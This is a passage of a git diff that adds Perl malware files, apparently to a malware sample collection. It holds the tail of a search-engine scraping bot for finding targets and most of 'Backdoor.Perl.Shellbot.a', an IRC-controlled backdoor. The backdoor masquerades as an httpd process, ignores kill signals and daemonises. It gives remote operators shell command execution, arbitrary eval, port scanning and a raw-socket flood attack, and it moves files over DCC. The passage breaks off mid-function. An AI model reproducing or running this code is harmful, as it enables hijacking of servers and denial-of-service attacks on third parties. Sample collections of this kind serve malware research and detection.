class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS MSN +##### +sub msn(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE"); +my $Res=query($MsN); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if($1 !~ /msn|live/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS SEARCH +##### +sub search(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $ser=("http://www.search.com/search?q=".key($key)."".$b); +my $Res=query($ser); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS FireBall +##### +sub fireball(){ +my $key=$_[0]; +my $inizio=1; +my $pagine=200; +my @lst; +my $av=0; +while($inizio <= $pagine){ +my $fireball="http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=fb_loc&idx=all&enc=utf-8"; +my $Res=query($fireball); +while ($Res=~ m/<a href=\"?http:\/\/(.+?)\//g ){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k="$1/"; +my @grep=links($k); +push(@lst,@grep); +}} +$av=$av+10; +$inizio++; +} +return @lst; +} + +##### +# SUBS UOL +##### +sub uol(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i); +my $Res=query($UoL); +while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){ +my $k=$1; +if($k!~/busca|uol|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# Altavista +##### +sub altavista(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); +my $Res=query($AlT); +while($Res=~m/<span class=ngrn>(.+?)\//g){ +if($1 !~ /altavista/){ +my $k=$1; +$k=~s/<//g; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub altavistade(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $AlT=("http://de.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); +my $Res=query($AlT); +while($Res=~m/<span class=ngrn>(.+?)\//g){ +if($1 !~ /altavista/){ +my $k=$1; +$k=~s/<//g; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub altavistaus(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $AlT=("http://us.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); +my $Res=query($AlT); +while($Res=~m/<span class=ngrn>(.+?)\//g){ +if($1 !~ /altavista/){ +my $k=$1; +$k=~s/<//g; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# HotBot +##### +sub hotbot(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $hot=("http://search.hotbot.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=hb_loc&enc=utf-8".$b); +my $Res=query($hot); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub hotbotb(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $hot=("http://search.hotbot.co.uk/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=hb_loc&enc=utf-8".$b); +my $Res=query($hot); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# Mamma +##### +sub mamma(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $mam=("http://www.mamma.com/Mamma?utfout=$av&qtype=0&query=".key($key)."".$b); +my $Res=query($mam); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# MozBot +##### +sub mozbot() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=100; $i+=1){ +my $mozbot=("http://www.mozbot.fr/search?q=".key($key)."&st=int&page=".$i); +my $Res=query($mozbot); +while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub mozbota() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=100; $i+=1){ +my $mozbot=("http://www.mozbot.co.uk/search?q=".key($key)."&st=int&page=".$i); +my $Res=query($mozbot); +while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub mozbotb() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=100; $i+=1){ +my $mozbot=("http://www.mozbot.com/search?q=".key($key)."&st=int&page=".$i); +my $Res=query($mozbot); +while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS AOL +##### +sub aol(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=100;$b++){ +my $AoL=("http://search.aol.co.uk/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8"); +my $Res=query($AoL); +while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub aola(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=59;$b+=1){ +my $AoL=("http://205.188.99.136/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_en"); +my $Res=query($AoL); +while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub aolb(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=59;$b+=1){ +my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_de"); +my $Res=query($AoL); +while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub aolc(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=59;$b+=1){ +my $AoL=("http://64.12.129.44/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_fr"); +my $Res=query($AoL); +while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS ASK +##### +sub ask(){ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=10) +{ +my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all"); +my $Res=query($Ask); +while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){ +my $k=$3; +$k=~s/[\"\ ]//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub aska(){ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=10) +{ +my $Ask=("http://uk.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all"); +my $Res=query($Ask); +while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){ +my $k=$3; +$k=~s/[\"\ ]//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub askb(){ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=10) +{ +my $Ask=("http://de.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all"); +my $Res=query($Ask); +while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){ +my $k=$3; +$k=~s/[\"\ ]//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub links() +{ +my @l; +my $link=$_[0]; +my $host=$_[0]; +my $hdir=$_[0]; +$hdir=~s/(.*)\/[^\/]*$/\1/; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$host.="/"; +$link.="/"; +$hdir.="/"; +$host=~s/\/\//\//g; +$hdir=~s/\/\//\//g; +$link=~s/\/\//\//g; +push(@l,$link,$host,$hdir); +return @l; +} + +sub geths(){ +my $host=$_[0]; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +return $host; +} + +sub os(){ +my $sito=$_[0]; +my $Res=query($sito); +my $type; +my $free; +my $str; +while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){ +$type=$1; +} +while($Res=~m/<br>Free:(.+?)\<br>/g){ +$free=$1; +} +$str=$type.",".$free; +return $str; +} + +sub key(){ +my $chiave=$_[0]; +$chiave =~ s/ /\+/g; +$chiave =~ s/:/\%3A/g; +$chiave =~ s/\//\%2F/g; +$chiave =~ s/&/\%26/g; +$chiave =~ s/\"/\%22/g; +$chiave =~ s/,/\%2C/g; +$chiave =~ s/\\/\%5C/g; +return $chiave; +} + +sub query($){ +my $url=$_[0]; +$url=~s/http:\/\///; +my $host=$url; +my $query=$url; +my $page=""; +$host=~s/href=\"?http:\/\///; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query=~s/$host//; +if ($query eq "") {$query="/";}; +eval { +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +close($sock); +}; +return $page; +} + +sub unici{ +my @unici = (); +my %visti = (); +foreach my $elemento ( @_ ) +{ +next if $visti{ $elemento }++; +push @unici, $elemento; +} +return @unici; +} + +sub http_query($){ +my ($url) = @_; +my $host=$url; +my $query=$url; +my $page=""; +$host =~ s/href=\"?http:\/\///; +$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query =~s/$host//; +if ($query eq "") {$query="/";}; +eval { +local $SIG{ALRM} = sub { die "1";}; +alarm 10; +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +alarm 0; +close($sock); +}; +return $page; +} +} + +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## diff --git a/Perl/Backdoor.Perl.Shellbot.a b/Perl/Backdoor.Perl.Shellbot.a new file mode 100644 index 00000000..4d287ff9 --- /dev/null +++ b/Perl/Backdoor.Perl.Shellbot.a @@ -0,0 +1,665 @@ +# +# ShellBOT - Atrix Team +# +# 0ldW0lf - oldwolf@atrix-team.org +# - www.atrix-team.org +# - www.atrix.cjb.net +# +# modificado por poerschke +# irc.gigachat.net #spykids +# +################ CONFIGURACAO ################################################################# +my $processo = "/hsphere/shared/apache/bin/httpd -DSSL"; # Nome do processo que vai aparece no ps # +#----------------------------------------------################################################ +my $linas_max="10"; # Evita o flood :) depois de X linhas # +#----------------------------------------------################################################ +my $sleep="4"; # ele dorme X segundos # +##################### IRC ##################################################################### +@adms=("poerschke","_CaKe_"); # Nick do administrador # +#----------------------------------------------################################################ +my @canais=("#perl"); # Caso haja senha ("#canal :senha") # +#----------------------------------------------################################################ +my $nick="spykids"; # Nick do bot. Caso esteja em uso vai aparecer # + # aparecer com numero radonamico no final # +#----------------------------------------------################################################ +my $ircname = "rox"; # User ID # +#----------------------------------------------################################################ +chop (my $realname = `uname -a`); # Full Name # +#----------------------------------------------################################################ +$servidor="irc.gigachat.net" unless $servidor; # Servidor de irc que vai ser usado # + # caso nуo seja especificado no argumento # +#----------------------------------------------################################################ +my $porta="6667"; # Porta do servidor de irc # +################ ACESSO A SHELL ############################################################### +my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell # +############################################################################################### + +my $VERSAO = "0.2"; + +$SIG{"INT"} = "IGNORE"; +$SIG{"HUP"} = "IGNORE"; +$SIG{"TERM"} = "IGNORE"; +$SIG{"CHLD"} = "IGNORE"; +$SIG{"PS"} = "IGNORE"; + +use IO::Socket; +use Socket; +use IO::Select; +chdir("/"); +$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Problema com o fork: $!" unless defined($pid); + + + +our %irc_servers; +our %DCC; +my $dcc_sel = new IO::Select->new(); + +############################# +# B0tchZ na veia ehehe :P # +############################# + +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == "1") { + my $socket = $_[0]; + print $socket "$_[1]\n"; + } else { + print $IRC_cur_socket "$_[0]\n"; + } +} + +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + + $irc_servers{$IRC_cur_socket}{"host"} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{"porta"} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{"nick"} = $meunick; + $irc_servers{$IRC_cur_socket}{"meuip"} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sleep 1; + } + +} +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + delete($irc_servers{""}) if (defined($irc_servers{""})); + &DCC::connections; + my @ready = $sel_cliente->can_read(0); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{"nick"}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + + for(my $c=0; $c<= $#lines; $c++) { + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=""; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + + + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION ShellBOT-$VERSAO por 0ldW0lf\001"); + } + if (grep {$_ =~ /^\Q$pn\E$/i } @adms) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } + if ($args =~ /^(\Q$meunick\E|\!atrix)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "!atrix" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } + } + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { + if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{"nick"} = $meunick; + } + } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { + nick("$meunick".int rand(9999)); + } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { + $meunick = $2; + $irc_servers{$IRC_cur_socket}{"nick"} = $meunick; + $irc_servers{$IRC_cur_socket}{"nome"} = "$1"; + foreach my $canal (@canais) { + sendraw("JOIN $canal"); + } + } +} + +sub bfunc { + my $printl = $_[0]; + my $funcarg = $_[1]; + if (my $pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + if ($funcarg =~ /^portscan (.*)/) { + my $hostip="$1"; + my @portas=( 44464, 4444, 14589, 666, 6666, 6968, 26092, 530, 46256, 31337, + 2222, 3879, 30464, 40193, 36864, 33270, 36864, 40193, 30464, + 8008, 1234, 6969, 7788, 1524, 10000, 12321, 43690, 3333, + 9999, 8975, 16705, 2313, 21317, 36864, 13330, 58821, 6682, 5678, + 45295, 65535, 26112, 7512, 24876, 9191, 5321, 50766, 1492, 12345, + 12346, 6969, 6970, 12666, 1666, 80, 21, 23, 25, 110, 5252, 9988, + 41254, 5074, 139, 44123); + my (@aberta, %porta_banner); + foreach my $porta (@portas) { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => "tcp", Timeout => 4); + if ($scansock) { + push (@aberta, $porta); + $scansock->close; + } + } + + if (@aberta) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta"); + } else { + sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada"); + } + } + + + + + if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) { + my ($dtime, %pacotes) = attacker("$1", "$2", "$3"); + $dtime = 1 if $dtime == 0; + my %bytes; + $bytes{igmp} = $2 * $pacotes{igmp}; + $bytes{icmp} = $2 * $pacotes{icmp}; + $bytes{o} = $2 * $pacotes{o}; + $bytes{udp} = $2 * $pacotes{udp}; + $bytes{tcp} = $2 * $pacotes{tcp}; + + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o})); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o})); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Mщdia de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps"); + + + } + exit; + } + } +} + +sub ircase { + my ($kem, $printl, $case) = @_; + + if ($case =~ /^entrar (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } + if ($case =~ /^rejoin\s+(.*)/) { + my $chan = $1; + if ($chan =~ /^(\d+) (.*)/) { + for (my $ca = 1; $ca <= $1; $ca++ ) { + p("$2"); + j("$2"); + } + } else { + p("$chan"); + j("$chan"); + } + } + if ($case =~ /^msg\s+(\S+) (.*)/) { + msg("$1", "$2"); + } + + if ($case =~ /^nick (.*)/) { + nick("$1"); + } + if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) { + conectar("$2", "$1", 6667); + } + if ($case =~ /^send\s+(\S+)\s+(\S+)/) { + DCC::SEND("$1", "$2"); + } + if ($case =~ /^raw (.*)/) { + sendraw("$1"); + } + if ($case =~ /^eval (.*)/) { + eval "$1"; + } +} +sub shell { + return unless $secv; + my $printl=$_[0]; + my $comando=$_[1]; + if ($comando =~ /cd (.*)/) { + chdir("$1") || msg("$printl", "Diertєrio inexistente!"); + return; + } + elsif ($pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + my @resp=`$comando 2>&1 3>&1`; + my $c=0; + foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c == "$linas_max") { + $c=0; + sleep $sleep; + } + } + exit; + } + } +} + +#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki +sub attacker { + my $iaddr = inet_aton($_[0]); + my $msg = "B" x $_[1]; + my $ftime = $_[2]; + my $cp = 0; + my (%pacotes); + $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; + + socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; + socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; + socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; + socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; + return(undef) if $cp == 4; + my $itime = time; + my ($cur_time); + while ( 1 ) { + for (my $porta = 1; $porta <= 65535; $porta++) { + $cur_time = time - $itime; + last if $cur_time >= $ftime; + send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; + send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; + send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; + send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + + # DoS ?? :P + for (my $pc = 3; $pc <= 255;$pc++) { + next if $pc == 6; + $cur_time = time - $itime; + last if $cur_time >= $ftime; + socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; + send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;; + } + } + last if $cur_time >= $ftime; + } + return($cur_time, %pacotes); +} + + + +############# +# ALIASES # +############# + +sub action { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001"); +} + +sub ctcp { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} +sub msg { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :$_[1]"); +} + +sub notice { + return unless $#_ == 1; + sendraw("NOTICE $_[0] :$_[1]"); +} + +sub op { + return unless $#_ == 1; + sendraw("MODE $_[0] +o $_[1]"); +} +sub deop { + return unless $#_ == 1; + sendraw("MODE $_[0] -o $_[1]"); +} +sub hop { + return unless $#_ == 1; + sendraw("MODE $_[0] +h $_[1]"); +} +sub dehop { + return unless $#_ == 1; + sendraw("MODE $_[0] +h $_[1]"); +} +sub voice { + return unless $#_ == 1; + sendraw("MODE $_[0] +v $_[1]"); +} +sub devoice { + return unless $#_ == 1; + sendraw("MODE $_[0] -v $_[1]"); +} +sub ban { + return unless $#_ == 1; + sendraw("MODE $_[0] +b $_[1]"); +} +sub unban { + return unless $#_ == 1; + sendraw("MODE $_[0] -b $_[1]"); +} +sub kick { + return unless $#_ == 1; + sendraw("KICK $_[0] $_[1] :$_[2]"); +} + +sub modo { + return unless $#_ == 0; + sendraw("MODE $_[0] $_[1]"); +} +sub mode { modo(@_); } + +sub j { &entrar(@_); } +sub entrar { + return unless $#_ == 0; + sendraw("JOIN $_[0]"); +} +sub p { part(@_); } +sub part {sendraw("PART $_[0]");} + +sub nick { + return unless $#_ == 0; + sendraw("NICK $_[0]"); +} + +sub invite { + return unless $#_ == 1; + sendraw("INVITE $_[1] $_[0]"); +} +sub topico { + return unless $#_ == 1; + sendraw("TOPIC $_[0] $_[1]"); +} +sub topic { topico(@_); } + +sub whois { + return unless $#_ == 0; + sendraw("WHOIS $_[0]"); +} +sub who { + return unless $#_ == 0; + sendraw("WHO $_[0]"); +} +sub names { + return unless $#_ == 0; + sendraw("NAMES $_[0]"); +} +sub away { + sendraw("AWAY $_[0]"); +} +sub back { away(); } +sub quit { + sendraw("QUIT :$_[0]"); +} + + + +# DCC +package DCC; + +sub connections { + my @ready = $dcc_sel->can_read(1); +# return unless (@ready); + foreach my $fh (@ready) { + my $dcctipo = $DCC{$fh}{tipo}; + my $arquivo = $DCC{$fh}{arquivo}; + my $bytes = $DCC{$fh}{bytes}; + my $cur_byte = $DCC{$fh}{curbyte}; + my $nick = $DCC{$fh}{nick}; + + my $msg; + my $nread = sysread($fh, $msg, 10240); + + if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) { + $DCC{$fh}{status} = "Cancelado"; + $DCC{$fh}{ftime} = time; + $dcc_sel->remove($fh); + $fh->close; + next; + } + + if ($dcctipo eq "get") { + $DCC{$fh}{curbyte} += length($msg); + + my $cur_byte = $DCC{$fh}{curbyte}; + + open(FILE, ">> $arquivo"); + print FILE "$msg" if ($cur_byte <= $bytes); + close(FILE); + + my $packbyte = pack("N", $cur_byte); + print $fh "$packbyte"; + + if ($bytes == $cur_byte) { + $dcc_sel->remove($fh); + $fh->close; + $DCC{$fh}{status} = "Recebido"; + $DCC{$fh}{ftime} = time; + next; + } + } elsif ($dcctipo eq "send") { + my $send = $fh->accept; + $send->autoflush(1); + $dcc_sel->add($send); + $dcc_sel->remove($fh); + $DCC{$send}{tipo} = "sendcon"; + $DCC{$send}{itime} = time; + $DCC{$send}{nick} = $nick; + $DCC{$send}{bytes} = $bytes; + $DCC{$send}{curbyte} = 0; + $DCC{$send}{arquivo} = $arquivo; + $DCC{$send}{ip} = $send->peerhost; + $DCC{$send}{porta} = $send->peerport; + $DCC{$send}{status} = "Enviando"; + + #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon + open(FILE, "< $arquivo"); + my $fbytes; + read(FILE, $fbytes, 1024); + print $send "$fbytes"; + close FILE; +# delete($DCC{$fh}); + } elsif ($dcctipo eq "sendcon") { + my $bytes_sended = unpack("N", $msg); + $DCC{$fh}{curbyte} = $bytes_sended; + if ($bytes_sended == $bytes) { + $fh->close; + $dcc_sel->remove($fh); + $DCC{$fh}{status} = "Enviado"; + $DCC{$fh}{ftime} = time; + next; + } + open(SENDFILE, "< $arquivo"); + seek(SENDFILE, $bytes_sended, 0); + my $send_bytes; + read(SENDFILE, $send_bytes, 1024); + print $fh "$send_bytes"; + close(SENDFILE); + } + } +} + + +sub SEND { + my ($nick, $arquivo) = @_; + unless (-r "$arquivo") { + return(0); + } + + my $dccark = $arquivo; + $dccark =~ s/[.*\/](\S+)/$1/; + + my $meuip = $::irc_servers{"$::IRC_cur_socket"}{"meuip"}; + my $longip = unpack("N",inet_aton($meuip)); + + my @filestat = stat($arquivo); + my $size_total=$filestat[7]; + if ($size_total == 0) { + return(0); + } + + my ($porta, $sendsock); + do { + $porta = int rand(64511); + $porta += 1024; + $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => "tcp") and $dcc_sel->add($sendsock); + } until $sendsock; + + $DCC{$sendsock}{tipo} = "send"; + $DCC{$sendsock}{nick} = $nick; + $DCC{$sendsock}{bytes} = $size_total; + $DCC{$sendsock}{arquivo} = $arquivo; + + + &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total"); + +} + +sub GET { + my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_; + return(0) if (-e "$arquivo"); + if (open(FILE, "> $arquivo")) { + close FILE; + } else { + return(0); + } + + my $dccip=fixaddr($dcclongip); + return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1); + my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0); + $dccsock->autoflush(1); + $dcc_sel->add($dccsock); + $DCC{$dccsock}{tipo} = "get"; + $DCC{$dccsock}{itime} = time; + $DCC{$dccsock}{nick} = $nick; + $DCC{$dccsock}{bytes} = $bytes; + $DCC{$dccsock}{curbyte} = 0; + $DCC{$dccsock}{arquivo} = $arquivo; + $DCC{$dccsock}{ip} = $dccip; + $DCC{$dccsock}{porta} = $dccporta; + $DCC{$dccsock}{status} = "Recebendo"; +} + +# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas +sub Status { + my $socket = shift; + my $sock_tipo = $DCC{$socket}{tipo}; + unless (lc($sock_tipo) eq "chat") { + my $nick = $DCC{$socket}{nick}; + my $arquivo = $DCC{$socket}{arquivo}; + my $itime = $DCC{$socket}{itime}; + my $ftime = time; + my $status = $DCC{$socket}{status}; + $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime}); + + my $d_time = $ftime-$itime; + + my $cur_byte = $DCC{$socket}{curbyte}; + my $bytes_total = $DCC{$socket}{bytes}; + + my $rate = 0; + $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0; + my $porcen = ($cur_byte*100)/$bytes_total; + + my ($r_duv, $p_duv); + if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) { + $r_duv = $3; $r_duv++ if $4 >= 5; + $rate = 